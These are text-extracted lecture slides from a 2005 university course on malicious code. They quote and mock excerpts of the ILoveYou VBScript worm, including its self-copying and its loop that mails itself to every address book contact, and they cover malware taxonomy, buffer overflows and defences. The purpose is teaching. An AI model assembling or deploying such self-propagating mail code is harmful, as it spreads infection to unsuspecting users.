Slide 1MenuLoveLetter.VBSMain Loopspreadtoemail (edited to fit)Slide 6Be Very Afraid...Attacking Malicious CodeTaxonomy of CodeTaxomony of Malcode [Stallings, p. 502]Worms and VirusesTrojan HorsesModern Trojan HorsesDifferences between Morris Worm 1988 and Melissa/ILoveYou 1999Vulnerabilities ExploitedBuffer OverflowsPreventing Buffer OverflowsReplication StrategyDamageOutcomesResponsesMalcode DefensesSlide 23Virus ScannersSlide 25Virus SpreadingCode RedSlide 28What Virus Scanner Peddlers Do (2001)Slide 30Always Click “Yes”Slide 32What Virus Scanner Peddlers Do (Today)Slide 34What it Should DoSlide 36The Best FirewallLesser FirewallNetworks – OSI ModelAn IP (V4) PacketA Simple Packet FilterTypical Packet Filtering RulesPacket Filter LayersApplication-Layer GatewaysMalcode on the Near HorizonMalcode SummaryChargeDavid Evanshttp://www.cs.virginia.edu/evansCS588: CryptographyUniversity of VirginiaComputer ScienceLecture 20:Malicious Code21 April 2005 University of Virginia CS 588 2Menu•Examination of ILoveYou Code•Malicious Code Taxonomy•Malcode Defenses Overview–Virus Scanners21 April 2005 University of Virginia CS 588 3LoveLetter.VBS•This 328-line program caused ~$10B in damage •How much work and smarts was required?21 April 2005 University of Virginia CS 588 4Main Looprem barok -loveletter(vbe) <i hate go to school>rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,PhilippinesOn Error Resume Next... wscr.RegWrite "...Scripting Host\ Settings\Timeout", 0sub main()...Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")...spreadtoemail()...end subSmart virus writers don’t include their contact information.Smart people would convey more interesting message.This was smart – turn off scripting timeout in registry. (Dumb for Microsoft.)21 April 2005 University of Virginia CS 588 5spreadtoemail (edited to fit)sub spreadtoemail()for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = “kindly check the attached LOVELETTER coming from me.” male.Attachments.Add(dirsystem& “\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Sendx=x+1 next nextend subSmart virus writers understand for loops.Smart virus writers can spell “mail”.21 April 2005 University of Virginia CS 588 621 April 2005 University of Virginia CS 588 7Be Very Afraid...•When really dumb people with no resources write malicious programs, it costs $10B.•What would happen if smart people with resources wrote a malicious program?–Paper link: Staniford, Paxson & Weaver, How to 0wn the Internet in Your Spare Time (2002)•“Warhol worm”: 15 minutes to 0wn Internet21 April 2005 University of Virginia CS 588 8Attacking Malicious Code•“Malicious Code” is a bad name–Code has no intent–Programmer’s intent doesn’t matter, what the code does matters•As networks get more programmable, accidentally harmful code will become common•We’ll use “malcode” (mal = bad)–Its not a great name either...21 April 2005 University of Virginia CS 588 9Taxonomy of CodeAll CodeMalcodeHarmless CodeCreated by Malicious AuthorAccidental(occasionally programs are actually useful, too)21 April 2005 University of Virginia CS 588 10Taxomony of Malcode[Stallings, p. 502]MalcodeRequires Host ProgramIndependentVirusesVirusesWormsWormsTrojan Trojan HorsesHorsesSelf-ReplicatingLogic Logic BombsBombsTrapTrapDoorsDoorsInsiders21 April 2005 University of Virginia CS 588 11Worms and Viruses•People get into stupid arguments over whether something is a “worm” or a “virus”–Is the Internet a host program?•See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988•Is Outlook a host program for an email?•Similarly, for worms/viruses/Trojans–If the user must open it (e.g., ILoveYou) it is self-replicating?21 April 2005 University of Virginia CS 588 12Trojan Horses•Greeks and Trojans at war –Eris (Discord), Paris, Aphroditie, Helen•Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.•Pretended to leave, left big wooden horse as gift•Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory.•Greeks jumped out, killed sentries, and let in Greek army.21 April 2005 University of Virginia CS 588 13Modern Trojan Horses•User runs program that looks harmless–Program pretends to be “cool, dancing bears”, also erases your hard drive•Most attacks today are Trojan Horses–ILoveYou, Melissa, recent Microsoft attack, etc.•Rely on modern humans being as dumb as mythical Trojans–No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code21 April 2005 University of Virginia CS 588 14Differences between Morris Worm 1988 and Melissa/ILoveYou 199921 April 2005 University of Virginia CS 588 15Vulnerabilities Exploited•Morris Worm:–Buffer overflow: fingerd uses gets–sendmail debug mode–Weak Unix passwords•Melissa:–Word enables macros by default, no limitations on macro behavior•ILoveYou:–Dumb people will run code attached to email•Code Red/Nimda:–Buffer overflow in IIS21 April 2005 University of Virginia CS 588 16Buffer OverflowsFrame PointerReturn Addresschar s[64];...int i;gets (s);Input more than 64 bits: gets just writes down stackbit 65: addressof bit 66 on stackbits 66-...: instructionsint k;21 April 2005 University of Virginia CS 588 17Preventing Buffer Overflows•Use run-time checks on all memory references–Safe languages (CLU, Java, Eiffel, etc.)–Safe libraries for C (don’t use gets, strcpy, etc.)•Obfuscation–Randomize locations in memory•Separate code and data segments–Make code segment unwriteable (once application loaded), only allow jumps in code segment•Static analysis–Check binary or source code•But – about ½ of recent vulnerabilities are still buffer overflows!21 April 2005 University of Virginia CS 588 18Replication Strategy•Morris Worm–Searched .forward files (should have used .rhosts) to find other hosts to attack–Used password guessing to break into other accounts–Used fingerd, sendmail vulnerabilites •Melissa/ILoveYou–Emails itself to